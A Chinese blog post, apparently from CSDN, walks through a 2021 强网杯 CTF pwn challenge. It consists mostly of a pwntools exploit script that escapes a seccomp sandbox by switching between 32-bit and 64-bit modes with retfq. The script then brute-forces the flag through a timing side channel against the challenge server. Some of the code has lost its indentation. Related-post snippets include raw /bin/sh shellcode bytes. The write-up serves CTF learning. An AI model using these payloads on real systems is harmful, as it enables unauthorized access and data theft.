强网杯2021CTF 强网先锋shellcode侧信道攻击复现

最新推荐文章于 2024-06-07 10:04:24 发布
最新推荐文章于 2024-06-07 10:04:24 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: CTF PWN 文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119939018
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

前言:由于个别原因这个比赛忘记参加了,所以赛后挑选了一道测信道攻击的题来进行复现,这个题开启了沙盒,采用测信道爆破flag,大概思路:使用retf切换到32位open来进行open('./flag'),retfq再回到64位的write和read就可以了,此题禁用了open所以使用32位的open,如果禁用了write就使用32位的write,同理,具体代码分析,懂汇编就能看懂这里就不赘述了,参考了别的大佬的exp,大概就是这样写的,至于系统调用号可以参考前篇调用号文章

exp:

from pwn import * 
elf=ELF('./shellcode')
 
def pwn(io,idx,ch):
  append_x86 = '''
  push ebx
  pop ebx
  '''
  shellcode_x86 = '''
  /*fp = open("flag")*/
  mov esp,0x40404140
  push 0x67616c66
  push esp
  pop ebx
  xor ecx,ecx
  mov eax,5
  int 0x80
  mov ecx,eax
  '''
  shellcode_flag = '''
  push 0x33
  push 0x40404089
  retfq
  /*read(fp,buf,0x70)*/
  mov rdi,rcx
  mov rsi,rsp
  mov rdx,0x70
  xor rax,rax
  syscall
  '''
  if index == 0:
  shellcode_flag+="cmp byte ptr[rsi+{0}],{1};jz $-3;ret".format(index,ch)
  else:
  shellcode_flag+="cmp byte ptr[rsi+{0}],{1};jz $-4;ret".format(index,ch)
  shellcode_x86 = asm(shellcode_x86)
  shellcode_flag = asm(shellcode_flag,arch = 'amd64',os = 'linux')
  shellcode = ''
  append = '''
  push rdx
  pop rdx
  '''
  shellcode_mmap = '''
  /*mmap(0x40404040,0x7e,7,34,0,0)*/
  push 0x40404040 /*set rdi*/
  pop rdi
  push 0x7e /*set rsi*/
  pop rsi
  push 0x40 /*set rdx*/
  pop rax
  xor al,0x47
  push rax
  pop rdx
  
  
  push 0x40 /*set r8*/
  pop rax
  xor al,0x40
  push rax
  pop r8
  push rax /*set r9*/
  pop r9
  /*syscall*/
  push rbx
  pop rax
  push 0x5d
  pop rcx
  xor byte ptr[rax+0x31],cl
  push 0x5f
  pop rcx
  xor byte ptr[rax+0x32],cl
  push 0x22 /*set rcx*/
  pop rcx
  push 0x40/*set rax*/
  pop rax
  xor al,0x49
  '''
  shellcode_read = '''
  /*read(0,0x40404040,0x70)*/
  push 0x40404040
  pop rsi
  push 0x40
  pop rax
  xor al,0x40
  push rax
  pop rdi
  xor al,0x40
  push 0x70
  pop rdx
  push rbx
  pop rax
  push 0x5d
  pop rcx
  xor byte ptr[rax+0x57],cl
  push 0x5f
  pop rcx
  xor byte ptr[rax+0x58],cl
  push rdx
  pop rax
  xor al,0x70
  '''
  shellcode_retfq = '''
  push rbx
  pop rax
  
  xor al,0x40
  push 0x72
  pop rcx
  xor byte ptr[rax+0x40],cl
  push 0x68
  pop rcx
  xor byte ptr[rax+0x40],cl
  push 0x47
  pop rcx
  sub byte ptr[rax+0x41],cl
  push 0x48
  pop rcx
  sub byte ptr[rax+0x41],cl
  push rdi
  push rdi
  push 0x23
  push 0x40404040
  pop rax
  push rax
  '''
  shellcode += shellcode_mmap
  shellcode += append
  shellcode += shellcode_read
  shellcode += append
  shellcode += shellcode_retfq
  shellcode += append
  shellcode = asm(shellcode,arch = 'amd64',os = 'linux')
  print(hex(len(shellcode)))
  io.sendline(shellcode)
  sleep(0.5)
  io.sendline(shellcode_x86 + 0x29*b'\x90' + shellcode_flag)
index = 0
a=[]
while True:
  for ch in range(0x20,127):
    #io=process('./chall')
    io=remote('39.105.137.118',50050)
    pwn(io,index,ch)
    start = time.time()
    try:
      io.recv(timeout=2)
      print("".join([chr(i) for i in a]))
    except:
      pass
    end=time.time()
    io.close()
    if end-start>1.5:
      a.append(ch)
      print("".join([chr(i) for i in a]))
      break
  else:
    print("".join([chr(i) for i in a]))
    break
  index = index + 1
print("".join([chr(i) for i in a]))

总结:学到了测信道爆破flag

jsjsj11123
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【pwn】记一道shellcode信道攻击
woodwhale的博客
10-16 4706
【pwn】记一道shellcode信道攻击 前言 契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊! 分析 checksec之后发现保护全开,打开ida分析发现有沙箱,直接查看沙箱 可以使用read open,不能使用write,并且判断了A < 0x40000000。 再进入ida看看 先mmap一段可执行的chunk,然后可以写入0x18长度的shellcode,最后设立沙箱规则之后执行我们刚刚写入的shellcode。 那么一种新的思路就是信道攻击
虎符CTF2022 —shellcode
qq_54894802的博客
09-21 267
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz中进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之中了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
CTF密码学之信道攻击出题思路
最新发布
攻防SRC
06-07 1270
欧几里得距离公式用于计算两个向量之间的距离。
[GDOUCTF 2023]Shellcode 全网最详细write up
qq_41937545的博客
11-02 552
64 位 较短的 shellcode -> 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05】​。32 位 短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。并且没有后门没有system。
简单来看看什么是信道攻击
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
05-10 1848
许多形式的安全漏洞,包括硬件和软件,往往集中在直接窃取秘密信息。另一方面,信道攻击是硬件安全攻击的一种分类,主要是通过利用非预期的信息泄漏来间接窃取信息。顾名思义,SCA不通过直接窃取信息来获得信息。相反,他们通过 "旁门左道 "窃取信息。图1中可以看到SCA的例子。SCA 之所以如此普遍,是因为电子系统固有地存在大量泄漏(即,通道)。这些信道包括:电源: 所有电子设备都通过电源轨供电。在基于功率的信道攻击中,攻击者将在运行期间监控设备的电源轨,以获取电流消耗或电压波动以窃取信息。
CTF-PWN-沙箱逃脱-【信道爆破】(2021-蓝帽杯初赛-slient)
llovewuzhengzi的博客
02-10 1554
如果比较成功了,那么程序将进入死循环(我们可以通过time这个模块来获取时间戳的差值),比如时间超过2秒那么我们对于flag的一个字节就爆破成功,超过两秒的原因是在未出现异常时设置了持续时间3秒的接收的操作,持续三秒后时间间隔肯定大于2秒,而出现异常的也就是没进入循环的(比较错误的)会出现异常。信道攻击是一种非正常的攻击手段,是一种利用计算机不经意间发出的声音来判断计算机的执行情况,比如通过散热器的响声大小来判断计算机所运行程序的复杂性;此为系统的分页大小,不一定会和硬件分页大小相同。
ctf编码总结
qq_42764617的博客
05-21 3859
CTF编码 1.ASCII编码: 2.Base64/32/16编码: 3.shellcode编码 4.Quoted-printable编码 5.XXencode编码: 6.UUencode编码: 7.URL编码: 8.Unicode编码: 9.Escape/Unescape编码 10.HTML实体编码: 11.敲击码 12.莫尔斯电码: 13.培根密码 14.MD5加密 16.当铺密码 18.栅栏密码 23.Hex: 1.ASCII编码: (America...
2018强网杯CTF-题目整理-校本图片Readme.zip
12-18
2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── 题目名称:...
2018强网杯CTF-题目整理.zip
12-17
2018强网杯CTF___题目整理
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
中山市香山杯 2021 CTF zip
12-07
中山市香山杯 2021 CTF zip
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
shellcode 的艺术
2301_77498991的博客
04-28 290
这里总结一下shellcode的各种类型。
BUUCTF WEB
qq_43633585的博客
09-28 398
warmup 题目描述 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_.
信道攻击
m0_73146715的博客
04-07 796
信道攻击的三种类型(功率分析攻击、电磁分析攻击、时间分析攻击)在应对方式上存在一些共同点和不同点。以下是它们的共同点和不同点的总结:共同点:1. 使用安全的设计和实现:所有类型的信道攻击都需要在设计密码系统和硬件实现时考虑这些攻击的风险,并采取措施减少这些风险。2. 物理隔离:为了减少对信道分析的干扰,所有类型的信道攻击都可能需要物理隔离密码模块与其他电路。3. 随机化:在密码操作中引入随机化的元素,如功率消耗、时间延迟等,以增加攻击者分析的难度。
mrctf2020_shellcode详解
勿山几已
06-09 570
简单演示mrctf2020_shellcode解题步骤
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1475
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
技巧篇:SCTF2020 coolcode信道攻击pwn题
qq_39948058的博客
08-27 803
**前言:第二次遇到信道攻击pwn题,禁用了open,同样需要切换32位使用open,随后利用retfq切换回来,进行rw。就可以了,这个不需要爆破,free为read,读取道bss段,rw即可,另一篇信道强网杯的一道强网先锋:http://www.maxbos44k.top/index.php/archives/102/http://www.maxbos44k.top/index.php/archives/103/。** 转载ChaMd5 exp: from pwn import * cont

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值